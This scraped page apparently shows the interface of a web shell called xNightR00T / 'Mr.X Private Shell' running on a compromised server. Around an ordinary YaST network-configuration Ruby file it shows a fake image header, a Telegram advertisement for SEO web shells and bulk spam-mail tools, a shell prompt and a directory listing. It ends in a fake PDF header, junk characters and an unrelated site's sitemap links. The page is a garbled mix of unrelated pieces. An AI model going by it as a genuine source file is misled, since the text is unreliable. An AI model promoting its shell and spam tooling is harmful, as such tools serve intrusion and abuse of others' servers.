xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# , :gw6dev encoding: utf-8

# ***************************************************************************
#
# Copyright (c) 2012 Novell, Inc.
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail,
# you may find current contact information at www.novell.com
#
# **************************************************************************
# File:	include/network/lan/dialogs.ycp
# Package:	Network configuration
# Summary:	Summary, overview and IO dialogs for network cards config
# Authors:	Michal Svec <msvec@suse.cz>
#
module Yast
  module NetworkLanComplexInclude
    def initialize_network_lan_complex(include_target)
      Yast.import "UI"

      textdomain "network"

      Yast.import "CWM"

      Yast.import "Lan"
      Yast.import "DNS"
      Yast.import "Mode"
      Yast.import "NetworkConfig"
      Yast.import "NetworkService"
      Yast.import "Routing"
      Yast.import "Wizard"
      Yast.import "Popup"
      Yast.import "Label"
      Yast.import "Package"
      Yast.import "TablePopup"
      Yast.import "CWMTab"
      Yast.import "Stage"
      Yast.import "LanItems"

      Yast.include include_target, "network/routines.rb"
      Yast.include include_target, "network/summary.rb"
      Yast.include include_target, "network/lan/help.rb"
      Yast.include include_target, "network/services/routing.rb"
      Yast.include include_target, "network/services/dns.rb"
      Yast.include include_target, "network/lan/dhcp.rb"
      Yast.include include_target, "network/lan/s390.rb"
      Yast.include include_target, "network/widgets.rb"

      @shown = false

      @wd = {
        "MANAGED"  => managed_widget,
        "IPV6"     => ipv6_widget,
        "OVERVIEW" => {
          "widget"        => :custom,
          "custom_widget" => VBox(
            VWeight(
              2,
              Table(
                Id(:_hw_items),
                Opt(:notify, :immediate),
                Header(_("Name"), _("IP Address"), _("Device"), _("Note"))
              )
            ),
            VWeight(1, RichText(Id(:_hw_sum), "")),
            HBox(
              *overview_buttons.map { |k, v| PushButton(Id(k), v) },
              HStretch()
            )
          ),
          "init"          => fun_ref(method(:initOverview), "void (string)"),
          "handle"        => fun_ref(
            method(:handleOverview),
            "symbol (string, map)"
          ),
          "help"          => Ops.get_string(
            @help,
            "overview",
            ""
          )
        }
      }

      @wd = Convert.convert(
        Builtins.union(@wd, @widget_descr_dns),
        from: "map",
        to:   "map <string, map <string, any>>"
      )
      @wd = Convert.convert(
        Builtins.union(@wd, @wd_routing),
        from: "map",
        to:   "map <string, map <string, any>>"
      )
      @wd = Convert.convert(
        Builtins.union(@wd, @widget_descr_dhclient),
        from: "map",
        to:   "map <string, map <string, any>>"
      )

      @tabs_descr = {
        "global"   => {
          "header"       => _("Global Options"),
          "contents"     => VBox(
            MarginBox(1, 0.49, "MANAGED"),
            MarginBox(1, 0.49, "IPV6"),
            MarginBox(1, 0.49, "DHCLIENT_OPTIONS"),
            VStretch()
          ),
          "widget_names" => ["MANAGED", "IPV6", "DHCLIENT_OPTIONS"]
        },
        "overview" => {
          "header"       => _("Overview"),
          "contents"     => VBox("OVERVIEW"),
          "widget_names" => ["OVERVIEW"]
        }
      }
      @tabs_descr = Builtins.union(@tabs_descr, @route_td)
      @tabs_descr = Builtins.union(@tabs_descr, @dns_td)
    end

    # Commit changes to internal structures
    # @return always `next
    def Commit
      LanItems.Commit
      :next
    end

    # Read settings dialog
    # @return `abort if aborted and `next otherwise
    def ReadDialog
      Wizard.RestoreHelp(Ops.get_string(@help, "read", ""))
      Lan.AbortFunction = -> { PollAbort() }
      ret = Lan.Read(:cache)

      if Lan.HaveXenBridge
        if !Popup.ContinueCancel(
          Builtins.sformat(
            # continue-cancel popup, #178848
            # %1 is a (long) path to a README file
            _(
              "A Xen network bridge was detected.\n" \
                "Due to the renaming of network interfaces by the bridge script,\n" \
                "network interfaces should not be configured or restarted.\n" \
                "See %1 for details."
            ),
            "/usr/share/doc/packages/xen/README.SuSE"
          )
        )
          ret = false
        end
      end

      ret ? :next : :abort
    end

    # Write settings dialog
    # @return `abort if aborted and `next otherwise
    def WriteDialog
      return :next if !Lan.Modified

      Wizard.RestoreHelp(Ops.get_string(@help, "write", ""))
      Lan.AbortFunction = -> { PollAbort() && ReallyAbort() }
      ret = Lan.Write
      ret ? :next : :abort
    end

    def AddInterface
      Lan.Add
      LanItems.operation = :add
      LanItems.SelectHWMap(Ops.get_map(LanItems.getCurrentItem, "hwinfo", {}))
      Ops.set(
        LanItems.Items,
        [LanItems.current, "ifcfg"],
        Ops.get_string(LanItems.getCurrentItem, ["hwinfo", "dev_name"], "")
      )
      Ops.set(LanItems.Items, [LanItems.current, "commited"], false)
      LanItems.operation = :edit
      fw = ""
      if LanItems.needFirmwareCurrentItem
        fw = LanItems.GetFirmwareForCurrentItem
        if fw != ""
          if !Package.Installed(fw) && !Package.Available(fw)
            Popup.Message(
              Builtins.sformat(
                _(
                  "Firmware is needed. Install it from \n" \
                    "the add-on CD.\n" \
                    "First add the add-on CD to your YaST software repositories then return \n" \
                    "to this configuration dialog.\n"
                )
              )
            )
            return false
          elsif !Builtins.contains(LanItems.Requires, fw)
            LanItems.Requires = Builtins.add(LanItems.Requires, fw)
          end
        else
          return Popup.ContinueCancel(
            _(
              "The device needs a firmware to function properly. Usually, it can be\n" \
                "downloaded from your driver vendor's Web page. \n" \
                "If you have already downloaded and installed the firmware, click\n" \
                "<b>Continue</b> to configure the device. Otherwise click <b>Cancel</b> and\n" \
                "return to this dialog once you have installed the firmware.\n"
            )
          )
        end
      end

      # this is one of 2 places to install packages :-(
      # - kernel modules (InstallKernel): before loaded
      # - wlan firmware: here, just because it is copied from modems
      #   #45960
      if LanItems.Requires != [] && !LanItems.Requires.nil?
        return false if PackagesInstall(LanItems.Requires) != :next
        if fw == "b43-fwcutter"
          if Popup.ContinueCancelHeadline(
            _("Installing firmware"),
            _(
              "For successful firmware installation, the 'install_bcm43xx_firmware' script needs to be executed. Execute it now?"
            )
          )
            command = Convert.convert(
              SCR.Execute(
                path(".target.bash_output"),
                "/usr/sbin/install_bcm43xx_firmware"
              ),
              from: "any",
              to:   "map <string, any>"
            )
            if Ops.get_integer(command, "exit", -1) != 0
              Popup.ErrorDetails(
                _("An error occurred during firmware installation."),
                Ops.get_string(command, "stderr", "")
              )
            else
              Popup.Message("bcm43xx_firmware installed successfully")
            end
          end
        end
      end
      #    TODO: Refresh hwinfo in LanItems
      true
    end

    # Returns true if the device can be used (means handled as normal linux device)
    # or false otherwise (it is used mainly at s390 based systems where a special
    # handling is needed to run linux device emulation)
    def DeviceReady(devname)
      !Arch.s390 || s390_DriverLoaded(devname)
    end

    def enableDisableButtons
      LanItems.current = Convert.to_integer(
        UI.QueryWidget(Id(:_hw_items), :CurrentItem)
      )

      UI.ChangeWidget(:_hw_sum, :Value, LanItems.GetItemDescription)
      if !LanItems.IsCurrentConfigured # unconfigured
        UI.ChangeWidget(Id(:delete), :Enabled, false)
      else
        UI.ChangeWidget(Id(:delete), :Enabled, true)
      end

      UI.ChangeWidget(Id(:edit), :Enabled, LanItems.enableCurrentEditButton)

      if !Mode.config && Lan.HaveXenBridge # #196479
        # #178848
        overview_buttons.keys.each { |b| UI.ChangeWidget(Id(b), :Enabled, false) }
      end

      nil
    end

    # Automatically configures slaves when user enslaves them into a bond or bridge device
    def UpdateSlaves
      current = LanItems.current

      Lan.autoconf_slaves.each do |dev|
        if LanItems.FindAndSelect(dev)
          LanItems.SetItem
        else
          dev_index = LanItems.FindDeviceIndex(dev)
          if dev_index < 0
            log.error("initOverview: invalid slave device name #{dev}")
            next
          end
          LanItems.current = dev_index

          AddInterface()
        end
        # clear defaults, some defaults are invalid for slaves and can cause troubles
        # in related sysconfig scripts or makes no sence for slaves (e.g. ip configuration).
        LanItems.netmask = ""
        LanItems.bootproto = "none"
        case LanItems.GetDeviceType(current)
        when "bond"
          LanItems.startmode = "hotplug"
          if LanItems.current_udev_rule.empty? || LanItems.GetItemUdev("KERNELS").empty?
            LanItems.update_item_udev_rule!(:bus_id)
          end
        when "br"
          LanItems.ipaddr = ""
        end

        LanItems.Commit
      end

      # Once the interfaces have been configured we should empty the list to
      # avoid configure them again in case that some interface is removed from the
      # master.
      Lan.autoconf_slaves = []

      LanItems.current = current

      nil
    end

    # Automatically updates interfaces configuration according users input.
    #
    # Perform automatic configuration based on user input. E.g. when an interface is inserted
    # into bond device and persistence based on bus id is required, then some configuration changes
    # are required in ifcfg and udev. It used to be needed to do it by hand before.
    def AutoUpdateOverview
      # TODO: allow disabling. E.g. if bus id based persistency is not requested.
      UpdateSlaves()

      nil
    end

    def initOverview(_key)
      # search for automatic updates
      AutoUpdateOverview()

      # update table with device description
      term_items =
        LanItems.Overview.map do |i|
          t = Item(Id(i["id"]))
          (i["table_descr"] || []).each { |l| t << l }
          t
        end

      UI.ChangeWidget(Id(:_hw_items), :Items, term_items)

      if !@shown
        disable_unconfigureable_items([:_hw_items, :_hw_sum] + overview_buttons.keys, true)
        @shown = true
      else
        enableDisableButtons
      end

      log.info("LanItems #{LanItems.Items}")

      nil
    end

    def handleOverview(_key, event)
      if !disable_unconfigureable_items([:_hw_items, :_hw_sum] + overview_buttons.keys, false)
        enableDisableButtons
      end
      UI.ChangeWidget(:_hw_sum, :Value, LanItems.GetItemDescription)

      if Ops.get_string(event, "EventReason", "") == "Activated"
        case Ops.get_symbol(event, "ID")
        when :add
          LanItems.AddNew
          Lan.Add

          # FIXME: This is for backward compatibility only
          # dhclient needs to set just one dhcp enabled interface to
          # DHCLIENT_SET_DEFAULT_ROUTE=yes. Otherwise interface is selected more
          # or less randomly (bnc#868187). However, UI is not ready for such change yet.
          # As it could easily happen that all interfaces are set to "no" (and
          # default route is unrecheable in such case) this explicite setup was
          # added.
          LanItems.set_default_route = true

          return :add
        when :edit
          if LanItems.IsCurrentConfigured
            LanItems.SetItem

            if LanItems.startmode == "managed"
              # Continue-Cancel popup
              if !Popup.ContinueCancel(
                _(
                  "The interface is currently set to be managed\n" \
                    "by the NetworkManager applet.\n" \
                    "\n" \
                    "If you edit the settings for this interface here,\n" \
                    "the interface will no longer be managed by NetworkManager.\n"
                )
              )
                # y2r: cannot break from middle of switch
                # but in this function return will do
                return nil # means cancel
              end

              # TODO: move the defaults to GetDefaultsForHW
              LanItems.startmode = "ifplugd"
            end
          else
            if !AddInterface()
              Builtins.y2error("handleOverview: AddInterface failed.")
              # y2r: cannot break from middle of switch
              # but in this function return will do
              return nil
            end

            # FIXME: This is for backward compatibility only
            # dhclient needs to set just one dhcp enabled interface to
            # DHCLIENT_SET_DEFAULT_ROUTE=yes. Otherwise interface is selected more
            # or less randomly (bnc#868187). However, UI is not ready for such change yet.
            # As it could easily happen that all interfaces are set to "no" (and
            # default route is unrecheable in such case) this explicite setup was
            # added.
            LanItems.set_default_route = true

            if !DeviceReady(
              Ops.get_string(
                LanItems.getCurrentItem,
                ["hwinfo", "dev_name"],
                ""
              )
            )
              return :init_s390
            end
          end

          return :edit

        when :delete
          # warn user when device to delete has STARTMODE=nfsroot (bnc#433867)
          devmap = LanItems.GetCurrentMap
          if devmap && devmap["STARTMODE"] == "nfsroot"
            if !Popup.YesNoHeadline(
              Label.WarningMsg,
              _("Device you select has STARTMODE=nfsroot. Really delete?")
            )
              # y2r: cannot break from middle of switch
              # but in this function return will do
              return nil
            end
          end

          LanItems.DeleteItem
          initOverview("")
        end
      end
      if Builtins.size(LanItems.Items) == 0
        UI.ChangeWidget(:_hw_sum, :Value, "")
        UI.ChangeWidget(Id(:edit), :Enabled, false)
        UI.ChangeWidget(Id(:delete), :Enabled, false)
        return nil
      end

      nil
    end

    def ManagedDialog
      contents = VBox(HSquash(VBox("MANAGED", VSpacing(0.5), "IPV6")))

      functions = { abort: fun_ref(method(:ReallyAbort), "boolean ()") }

      ret = CWM.ShowAndRun(
        "widget_descr"       => @wd,
        "contents"           => contents,
        # Network setup method dialog caption
        "caption"            => _(
          "Network Setup Method"
        ),
        "back_button"        => Label.BackButton,
        "abort_button"       => Label.CancelButton,
        "next_button"        => Label.OKButton,
        # #54027
        "disable_buttons"    => ["back_button"],
        "fallback_functions" => functions
      )

      # #148485: always show the device overview
      ret
    end

    # Evaluates if user should be asked again according dialogs result value
    #
    # it is basically useful if user aborts dialog and he has done some
    # changes already. Calling this function may results in confirmation
    # popup.
    def input_done?(ret)
      return true if ret != :abort

      return Popup.ConfirmAbort(:painless) if Stage.initial

      return ReallyAbort() if LanItems.GetModified

      true
    end

    def MainDialog(init_tab)
      caption = _("Network Settings")
      widget_descr = {
        "tab" => CWMTab.CreateWidget(
          "tab_order"    => if Stage.normal
                              ["global", "overview", "resolv", "route"]
                            else
                              ["overview", "resolv", "route"]
                            end,
          "tabs"         => @tabs_descr,
          "widget_descr" => @wd,
          "initial_tab"  => Stage.normal ? init_tab : "overview",
          "tab_help"     => ""
        )
      }
      contents = VBox("tab")

      w = CWM.CreateWidgets(
        ["tab"],
        Convert.convert(
          widget_descr,
          from: "map",
          to:   "map <string, map <string, any>>"
        )
      )

      help = CWM.MergeHelps(w)
      contents = CWM.PrepareDialog(contents, w)
      running_installer = Mode.installation || Mode.update

      Wizard.SetContentsButtons(
        caption,
        contents,
        help,
        Label.BackButton,
        running_installer ? Label.NextButton : Label.OKButton
      )

      if running_installer
        Wizard.SetAbortButton(:abort, Label.AbortButton)
      else
        Wizard.SetAbortButton(:abort, Label.CancelButton)
        Wizard.HideBackButton
      end

      ret = nil
      loop do
        ret = CWM.Run(w, {})
        break if input_done?(ret)
      end

      ret
    end

  private

    def overview_buttons
      ret = {}

      ret[:add]    = Label.AddButton
      ret[:edit]   = Label.EditButton
      ret[:delete] = Label.DeleteButton

      ret
    end
  end
end

Filemanager

Name Type Size Permission Actions
address.rb File 52.49 KB 0644
bridge.rb File 3.3 KB 0644
cards.rb File 17.29 KB 0644
cmdline.rb File 9.84 KB 0644
complex.rb File 18.12 KB 0644
dhcp.rb File 4.77 KB 0644
hardware.rb File 37.49 KB 0644
help.rb File 27.94 KB 0644
s390.rb File 3.05 KB 0644
udev.rb File 3.36 KB 0644
virtual.rb File 8.04 KB 0644
wireless.rb File 45.08 KB 0644
wizards.rb File 7.26 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml